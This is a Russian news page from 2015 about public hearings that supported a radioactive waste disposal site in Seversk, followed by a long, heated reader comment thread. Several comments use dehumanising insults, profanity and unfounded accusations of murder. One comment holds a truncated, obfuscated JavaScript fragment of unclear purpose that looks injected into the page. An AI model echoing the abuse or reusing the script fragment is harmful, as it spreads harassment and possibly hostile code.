Последние комментарии:

23.11.2024 14:11 написал ponni
20.11.2024 22:44 написал ponni
15.11.2024 23:54 написал ponni
09.11.2024 00:00 написал ponni
29.10.2024 18:48 написал ponni
27.10.2024 16:10 написал ТЕРРАН
27.10.2024 16:07 написал ТЕРРАН
27.10.2024 16:04 написал ТЕРРАН
24.10.2024 22:25 написал sprinter
18.10.2024 07:53 написал sprinter
12.10.2024 10:47 написал alex33kaw
10.10.2024 08:51 написал sprinter
02.10.2024 19:41 написал ponni
27.09.2024 16:36 написал ponni
24.09.2024 17:28 написал sprinter


Общественность поддержала создание пункта захоронения радиоактивных отходов


Общественность поддержала создание пункта захоронения радиоактивных отходов

Представители общественности в пятницу поддержали на слушаниях проект создания в городе Северск пункта захоронения радиоактивных отходов (ПЗРО) 3 и 4 классов, передает корреспондент РИА Томск с места событий.

Ранее сообщалось, что Национальный оператор по обращению с радиоактивными отходами НО РАО планирует построить в Северске ПЗРО, куда будут поступать отходы от деятельности Сибирского химического комбината (СХК) и других предприятий атомной отрасли Сибири. Если проект одобрит общественность, начнется проектирование объекта, который планируется построить в 2019-2021 годах.

Оптимальный вариант

Выступая на общественных слушаниях, замдиректора НО РАО Денис Егоров заверил северчан, что ПЗРО будет соответствовать всем требованиям безопасности.

Предполагается, что РАО 3 и 4 классов (короткоживущие среднеактивные, низкоактивные и очень низкоактивные) будут храниться в специальных контейнерах, изолированных несколькими защитными барьерами.

По словам Егорова, строительство, эксплуатация, закрытие и последующий мониторинг состояния объекта обойдутся приблизительно в 6 миллиардов рублей в ценах 2015 года. Предполагается, что они будут выделены из специального резервного фонда Росатома. Кроме того, предприятия, производящие РАО, будут обязаны выплачивать определенные средства на их захоронение.

Он добавил, что принимая решение о создании ПЗРО в Северске, эксперты рассматривали и другие варианты.

"Например, перевезти объем отходов, которые уже есть и которые будут образовываться, в другой регион, в построенное там захоронение. Мы считаем, что этот вариант нецелесообразен, так как перевозка такого большого количества РАО повлечет дополнительные экологические риски при транспортировке и возникнет дополнительная финансовая нагрузка", – сказал Егоров.

По его словам, в качестве еще одного варианта рассматривалось не строительство нового хранилища, а продление сроков эксплуатации действующих. Однако они изначально строились как временные, а значит, не могут обеспечить защиту на весь период (несколько веков) потенциальной опасности отходов. При этом продление сроков безопасности требует больших финансовых затрат.

"Таким образом, можно сделать вывод, что отказ от создания объекта (ПЗРО – ред.) не обеспечит долговременной надежной изоляции накопленных и образующихся радиоактивных отходов в районе расположения Сибирского химического комбината", – подчеркнул Егоров.

При этом проектная документация для пункта захоронения пока не разработана. Для начала проектирования необходимо, в частности, пройти общественные слушания по материалам оценки воздействия на окружающую среду (ОВОС). Публичные обсуждения продлятся до 26 января, материалы по проекту ПЗРО все это время будут находиться в открытом доступе.

Строить надо, но под строгим контролем

На общественных слушаниях в Северске присутствовали порядка 250 человек. Ни один из выступающих представителей общественности резко не высказался против строительства ПЗРО. Проект поддержали и ученые, и экологи.
Например, председатель регионального экологического центра "Стриж" Сергей Жабин отметил, что представители НО РАО "ответственно относятся" к проработке проекта и работе с населением. "С каким подходом подходят – у меня вызывает доверие. Хорошо бы появился национальный оператор с таким подходом и занялся организацией наших бытовых отходов", – отметил он.

По мнению Жабина, при реализации проекта главное – обеспечить контроль за проектированием и строительством ПЗРО. Причем, следить за ходом работ должны не только контролирующие органы, но и сами томичи и северчане. "У вас в Северске общество активное. Я думаю, под вашим контролем построят нормальный, нужный для всех томичей объект", – сказал он.

Проект одобрил и другой эколог – Алексей Торопов. "Недавно мне показали одну книгу. Ее автор предлагает реализовать систему обращения с РАО в следующем виде: каждой семье, которая будет жить в родовом поместье, выдать по капсуле с РАО, чтобы семья хранила ее у себя. К счастью, специалисты таких подходов не предлагают. Предлагается совершенно адекватный проект", – сказал он.

По мнению Торопова, проект отвечает всем техническим требованиям и требованиям законодательства. При этом, он актуален не только для томичей, но и для всех сибиряков, так как в северском ПЗРО будут также храниться отходы предприятий из соседних регионов, но их доля будет небольшой.
"Я поддерживаю проект от имени нашей организации. Это официальная позиция "Сибирского экологического агентства" и томского (подразделения) "Зеленого креста". Мы должны показать слаженность не только в обсуждении проекта, но и качественно реализовать его", – подчеркнул эколог.

В свою очередь академик Международной академии наук экологии, безопасности человека и природы Олег Муратов подчеркнул, что планируемый в Северске ПЗРО – не первый в мире подобный объект.

"В мире есть такие объекты. Например, в провинции Шампань во Франции, где вина делают , в Корее такой объект расположен на территории национального парка, где проводятся и культурные мероприятия – фестивали и многие другие. И никакого внешнего воздействия они (пункты захоронения) не оказывают", – привел в пример Муратов.

По его мнению, на данной стадии проект северского ПЗРО позволяет предположить высокую надежность объекта.

"Потенциальная опасность РАО, на которую рассчитан пункт, оценивается 500 лет. Это очень хорошо. Потенциальная опасность – это 10 периодов полураспада. К короткоживущим отходам относятся радионуклиды с периодом полураспада 31 год. Значит, 10 периодов полураспада – это 310 лет. Здесь же заложен практически двойной запас", – пояснил ученый.

Источник РИА Новости





Категория: Новости » Северск » Общество

Комментарии: (47) 

28 декабря 2015   -7

Информация

Посетители, находящиеся в группе Гости, не могут оставлять комментарии в данной новости.
 

Комментарий № 1:

Написал: sait
Я так понимаю общественность это те, кто бабла ждёт от этих захоронений. Весь город против а общественность за!!! Бред

Комментарий № 2:

Написал: Землянин

Любой человек не позволит у порога своего дома гадить. Хоть по третьему, хоть по четвёртому классу. Очевидно, что представители общественности, о которых в статье – мутанты, выродки, твари, холуи нелюди.

Комментарий № 3:

Написал: saza
Какой дурак данный объект строит на равнине, тем более все эти отходы сконцентрировани в одном месте, какой-нибудь сумашедший или террорист угонит самолет и направит в сторону этих складов ,ничего не мешает нет ни гор никакой защиты . Бум и вся  Западная Сибирь превратится в экологическую катастрофу.В Германии и Франции данные объекты строят в горах в шахтах ,в труднодоступных местах как для самолетов так и для ракет.

Комментарий № 4:

Написал: Пуля
Вот так и делают у нас дела,
обыденно и без всеобщего согласия,
как будто бочки в погребе
с капустою заквасили.

Комментарий № 5:

Написал: ololo
Не, ну с одной стороны это конечно опасно, спору нет.
Но с другой стороны благодаря тому, что будут захоранивать всё в одном месте - отчистятся другие места в стране. У нас же и раньше свои отходы захоранивали, а теперь их надо перехоронить в более надёжном месте. Да и в случаи войды их можно будет откопать и в боеголовки зарядить. Да и город вряд ли откроют из-за этих захоронений.

Комментарий № 6:

Написал: Kapitalin-nike

А с поименным списком этой "общественности" где можно ознакомиться, чтобы точно знать, у чьих дверей всем остальным можно будет справлять нужду?

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "vseverske.info"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Комментарий № 7:

Написал: воспитатель
Вот и славно, те кто против открытия города, ЗА строительство пункта захоронений, всего и делов то.... а по другому в природе не может быть иначе в этом году в открылись...

Комментарий № 8:

Написал: Эколог
Общественные слушания в ЗАТО происходят по одному принципу, "партия" постановила, народ по возмущался, в резолюции принято без возражений

Комментарий № 9:

Написал: Завсегдатый
Эколог,

Ага, именно так это и происходило, многие были против, а оказывается, что общественность поддержала создания пункта захоронения дерьма!

Комментарий № 10:

Написал: Бука
Мы все против, захоранивайте свои отходы в тайге, за 1000км отсюда, хоть купайтесь там. А взрыва онкологии тут не нужно.

Комментарий № 11:

Написал: f1gv83
предлагаю на Красной площади вырыть могильник и туда все спихивать! вместе с цистернами, чтоб не мучиться с разделением.

интересно, как быстро хаты там подешевеют и вся прикентовка пятки салом смажет?

Комментарий № 12:

Написал: ololo
Да всем плевать что вы против. Смиритесь с этим.
Москва выделяет на захоронение деньги, часть которых остаётся в карманах чиновников и людей, которые разрешают эти захоронения.
Москве пофиг на нас, Москве пофиг на Сибирь, мы дляних не люди, а лишь рабочая сила. Люди те, у кого есть власть и деньги. А мы - помойка и место откуда можно качать нефть и газ.

Комментарий № 13:

Написал: Trololo_70lvl
Цитата: Kapitalin-nike
А с поименным списком этой "общественности" где можно ознакомиться, чтобы точно знать, у чьих дверей всем остальным можно будет справлять нужду?
Заметили, что ни один "шоколадник" , даже Семёновна , не отписались в данной теме - ибо стыдно.  Смело можно справлять нужду под двери каждого работника СХК. Их, правда не по своей нужде, а по принуждению и под угрозой увольнения, согнали с обязательной отметкой в "списке приглашённых" на это цирковое представление. Активистам-пэсээровцам раздали на бумажках нужные вопросы, на которые докладчики отвечали по бумажкам. Потом дружно "одобрили". 

Комментарий № 14:

Написал: draizer
А не пора ли вернуть компенсацию за проживание в опасной 30-ти км. зоне.

Комментарий № 15:

Написал: тайга

Твари пляя! Уроды !!! Решили суки всем Северчанам и Томичам свинью подложить !  А Северск так вообще в отхожее место превращают , теперь сюда будут срать со всей России да и из за границы !

Общественность ипучая , ну и где вы уроды ? Какой нормальный человек разрешит у себя дома , в квартире устраивать общественную сральню ?   am am am 



--------------------
В России две напасти:
Внизу власть тьмы.
Вверху тьма власти.


Комментарий № 16:

Написал: Woin
Однако они изначально строились как временные, а значит, не могут обеспечить защиту на весь период (несколько веков) потенциальной опасности отходов. При этом продление сроков безопасности требует больших финансовых затрат.        Вот и ответ, было мало дерьма,так еще свое добавим ,а если маловато будет и со всей страны подкинем, а за отдельную плату иностранцам поможем!!!                                                                       При этом, он актуален не только для томичей, но и для всех сибиряков, так как в северском ПЗРО будут также храниться отходы предприятий из соседних регионов, но их доля будет небольшой.                      И в чем же актуальность!? Вот типа сидят дома северчане и томичи и разговоры разговаривают"скорей бы к нам отходы привезли да побыстрей -это очень актуально!!!

Комментарий № 17:

Написал: semenovna
Собрались деванные генералы и давай комментировать!

А вы почему все на слушания не пришли?  Там бы ваши вопросы и задавали и не в воздух как сейчас. И те кто поддержал проект в лицо увидели и узнали, что это не только работники СХК. Против реализации проекта никто против не высказался. Его поддержали все представители экологических организаций. 

 

Комментарий № 18:

Написал: semenovna
Тех, кто ещё думает, что это будет радиоактивная свалка - спешу разочаровать. Будет современное, отвечающее всем современным нормам хранилище. Большая его часть будет предназначено для отходов с останавливаемых производств комбината.

Так бы их хранили во временном хранилище, а так будет современное и самое безопасное.  

Комментарий № 19:

Написал: semenovna
Речь совсем не о том, чтобы "гадить у себя под дверью", а цивилизованно навести порядок и потом за этим следить, чтобы проблем с этими отходами не было. 

Комментарий № 20:

Написал: semenovna
Trololo_70lvl,


Вы были на слушаниях? Если нет, то и пасть не надо, что туда сгоняли всех. Каждый мог прийти и высказать своём мнение свободно. 

Комментарий № 21:

Написал: semenovna
f1gv83,

АЭС планировали строить - ничего не дешевело, БРЕСТ уже строят - ничего не дешевеет, ПЗРО ещё только обсуждают и тут квартиры подешевеют? Бред! 

 

Комментарий № 22:

Написал: semenovna
saza,
В Германии, Франции и даже в Южной Корее эти хранилища приповерхностные. Т.е. Это небольшой холм над землёй. Все отходы там закрыты в бетонных блоках и засыпаны несколько метровым слоем земли. И все! 

В Южной Корее хранилище находится в национальном парке, который ежедневно посещает большое количество людей.

 

Комментарий № 23:

Написал: bolek
semenovna,
Цитата: semenovna
В Южной Корее хранилище находится в национальном парке, который ежедневно посещает большое количество людей.
 

Ссылочку можно, в каком национальном парке находится данное хранилище? Сам нешел уже:
http://www.atomic-energy.ru/news/2015/08/31/59398

Если вы про это хранилище близ города Кёнджу, так оно только открылось 28 августа 2015 года. И нет никаких гарантий, что оно через 3 месяца не закроется из-за каких-либо негативных воздействий на окружающую среду, а люди, побывавшие в этом "национальном парке" не начнут лет через пять умирать, как мухи, так и не поняв, из- за чего это происходит!  

Комментарий № 24:

Написал: тайга
Цитата: semenovna
Речь совсем не о том, чтобы "гадить у себя под дверью", а цивилизованно
 Мы вот тут общественное слушанье провели и порешили – что будем приходить к тебе в квартиру и срать в уголочке ! Да ты не волнуйся , вонять не будет , мы песочком присыпать будем ! Что , не согласна ? А чего так ? Надо было приходить на наши общественные слушанья , а теперь смирись, решение срать у тебя в квартире уже принято ! fellow 



--------------------
В России две напасти:
Внизу власть тьмы.
Вверху тьма власти.


Комментарий № 25:

Написал: Hornet
semenovna,
Даже если это всё будет так безопасно, в чём я очень сомневаюсь, ибо человеческий фактор ни кто не отменял, может ли быть здравым стремление человека расположить вблизи места своего проживания то, от чего все нормальные люди предпочитают избавиться (и отправить в Северск).

Комментарий № 26:

Написал: Trololo_70lvl
Hornet,
Если бы этим уродам, для их детей и внуков, построили детский сад над захоронением, а для них самих рекреационную зону там же,  с обязательным посещением всем трудовым коллективом, так же как они дружно одобрили могильник - они бы тут так не убирались. А эта Академия  экологии и еще чего-то там - ручная общественная организация, за деньги от кремлежуликов, будет готова одобрить для россиян импортозамещение продуктов питания на отечественные  радиоизотопы.
semenovna,
сука, не я пасть раздеваю,  а ты нагло п.здишь - 100 % информация, что сгоняли на это сборище работяг целыми трудовыми коллективами  как скот, хотя ты то ,конечно, пришла туда по зову сердца. ВЫ везде и всегда так голосуете, как скажут сверху .

Комментарий № 27:

Написал: Пуля
Всегда найдётся человек,
который ''убедит'' и ''успокоит,''
но только  короток наш век,
и укорачивать его не стоит.

Комментарий № 28:

Написал: Hornet
Trololo_70lvl,
Вообще, semenovna - это мужик с ОДЦ, если чё.
Стоит задуматься.

Комментарий № 29:

Написал: Trololo_70lvl
semenovna,
для вашего пиар-агентства пропаганды СХК по этой теме  дарю идею. Запилите видео с рядовым работягой. Тест примерно такой:
- Я, потомственный шоколадник, представитель трудовой династии, услышав об общественных слушаниях, и радея за светлое будущее своего родного города, по зову сердца решил принять в них участие. Послушав доклады руководителей города и Комбината, а также экологов, понял чего так не хватало нашему городу для более комфортной жизни и процветания граждан на многие поколения вперед ! Поэтому всей душой, как представитель общественности,  проголосовал за ядерную помойку этот экологический проект на территории нашего города. Это истинное счастье, что меня поддержали мои коллеги и родные, ведь всё это делается для них, во имя их будущего! 
  Только хер вы найдете исполнителя роли среди горожан,  даже за голливудский гонорар. Задорно и убедительно должно получиться у Владимира Машкова, пригласите его. 

Комментарий № 30:

Написал: коля-ваня
Уместно будет процетировать нашего Александра Юрьевича Нонеймова: 
 
NoName : опасный объект у нас в городе - это тоже повод для положительной оценки и даже, для праздника.
 
                                       


--------------------
.

Комментарий № 31:

Написал: kvk

semenovna С каких пор в России такой же уровень ответственности и жизни как во Франции и Ю. Корее? Сколько аварий, аналогичных Чернобыльской и авариям на СХК и в каком году произошло в указанных странах?

Комментарий № 32:

Написал: SergeyHasan
semenovna,
полный бред несете

Комментарий № 33:

Написал: Bars62

Комментарий № 34:

Написал: semenovna
bolek,

Думаете радиационный уровень там не замеряют? Какое ещё негативное воздействие может быть?

Комментарий № 35:

Написал: semenovna
тайга,
Вы почему не пришли? Вопросы не задали?

сейчас конечно можно смело здесь писать оскорблерия - видимо для вас этот сайт и сделали, что бы вы пар тут могли спустить 

Комментарий № 36:

Написал: semenovna
Hornet,
Ещё раз - логика размещения ПЗРО - близость СХК как главного поставщика отходов в виду вывода производств из эксплуатации. Зачем таскать отходы в другой регион, когда можно здесь цивилизовано и безопасно захоронить. На СХК многие годы идёт захоронение жро. Это происходит под контролем и постоянным мониторингом. Для жителей города никакой опасности от этого нет. 

Комментарий № 37:

Написал: semenovna
SergeyHasan,
По пунктам, что бред, а что нет?

Комментарий № 38:

Написал: Hornet
Цитата: semenovna
Зачем таскать отходы в другой регион, когда можно здесь цивилизовано и безопасно захоронить.
 
Вопросов бы не было, если собрались хоронить только какашки СХК, но ведь АО "Атомспецтранс" для того и расплодили, чтобы сюда возить из других регионов. 

Комментарий № 39:

Написал: semenovna
Hornet,

Интересная логика, Атомспецтранс совсем не для этого выделяли. Когда это было разговор про ПЗРО ещё не шёл. 
С других областей конечно же везти будут, но это в небольших количествах и в основном отходы медицины или научных исследований.  
Какой смысл делать ПЗРО в каждой области, если можно сделать там, где основной объём отходов формируется.  

Комментарий № 40:

Написал: Землянин
Цитата: semenovna
Вы почему не пришли? Вопросы не задали?
 
Здравомыслящие люди не пойдут на шабаш, организованный нелюдью, на котором их холуи, мутанты, выродки будут рассказывать о своих планах на тысячелетия по убиению людей. 

Комментарий № 41:

Написал: Землянин

Радиоактивные отходы сокращают жизнь людей. Этот факт очевиден любому человеку. Планы, о которых в статье – это планы по убийству людей. Поэтому, представители общественности – это соучастники убийц людей, члены мразоцеха, о котором здесь - http://www.youtube.com/watch?v=jtm96hxOCYc .  

Комментарий № 42:

Написал: Землянин

Согласно п.76 Указа Президента РФ от 31.12.2015 № 683 «О Стратегии национальной безопасности Российской Федерации» (Указ) - http://www.garant.ru/hotlaw/federal/688504/ , сохранение и приумножение традиционных российских духовно-нравственных ценностей признаны стратегическими целями для национальной безопасности России. 

К традиционным российским духовно-нравственным ценностям относятся, в том числе, защита человеческой жизни, гуманизм (п.78)

Очевидно, планы мразюков, представителей общественности, о которых в статье, противоречат Указу, представляют угрозу национальной безопасности России. 

Комментарий № 43:

Написал: semenovna
А ещё у людей есть право на качественную медицину и на плоды научных достижений, отходы от которых и будут в новом хранилище. 

Если вы считаете слушания сбором идиотов, то не надо это обсуждение превращать в этот сбор.  

И каким это образом радиоактивные отходы начали сокращать жизни людей?
Их начали принимать в пищу?  

Комментарий № 44:

Написал: Землянин
Цитата: semenovna
А ещё у людей есть право на качественную медицину и на плоды научных достижений, отходы от которых и будут в новом хранилище. 
 

Указанные права с хранилищем отходов плодов научных достижений – от нелюди, дурилка для лохов.

Во «Всеобщей декларации прав человека» - http://www.consultant.ru/document/cons_doc_LAW_120805/ :

 -  «Каждый человек имеет право на такой жизненный уровень, включая пищу, одежду, жилище, медицинский уход и необходимое социальное обслуживание, который необходим для поддержания здоровья и благосостояния его самого и его семьи, и право на обеспечение на случай безработицы, болезни, инвалидности, вдовства, наступления старости или иного случая утраты средств к существованию по не зависящим от него обстоятельствам.» (п.1., статья 25)

- «Каждый человек имеет право свободно участвовать в культурной жизни общества, наслаждаться искусством, участвовать в научном прогрессе и пользоваться его благами.»( (п.1., статья 27) 

Комментарий № 45:

Написал: Землянин
Цитата: semenovna
И каким это образом радиоактивные отходы начали сокращать жизни людей?
 
Не дуркуй. Обратись к специалистам. 

Комментарий № 46:

Написал: semenovna
Землянин,
Вот от этой научной и медицинской деятельности и бывают отходы разной степени опасности, в том числе, радиоактивные. Перечисленные вами статьи совсем не противоречат созданию ПЗРО, потому что жители города должны быть в безопасности. Именно это и гарантирует данное хранилище. 

Комментарий № 47:

Написал: Землянин
Цитата: semenovna
жители города должны быть в безопасности. Именно это и гарантирует данное хранилище
 

Опять дуркуешь, semenovna. Очевидно, что пункт захоронения радиоактивных отходов гарантом безопасности жителей не является. Этот факт может проверить любой желающий - http://www.garant.ru/hotlaw/federal/688504/

Радиоактивные отходы сокращают жизнь людей. Этот факт очевиден любому человеку. Планы, о которых в статье – это планы по убийству людей. Поэтому, представители общественности – это соучастники убийц людей, члены мразоцеха, о котором здесь - http://www.youtube.com/watch?v=jtm96hxOCYc . 
stroimguru.ru
Курс валюты:
108.0 10↑   $     113.0 94↑  

Опрос дня:

Вы будете делать прививку от коронавируса?

Нет   49.38%
   
Да, планирую   8.64%
   
Да, но если заставят (на работе / для путешествий)   4.94%
   
Уже сделал   27.16%
   
Затрудняюсь ответить   9.88%
   
Всего голосов: 81

Все опросы >>

Архив статей: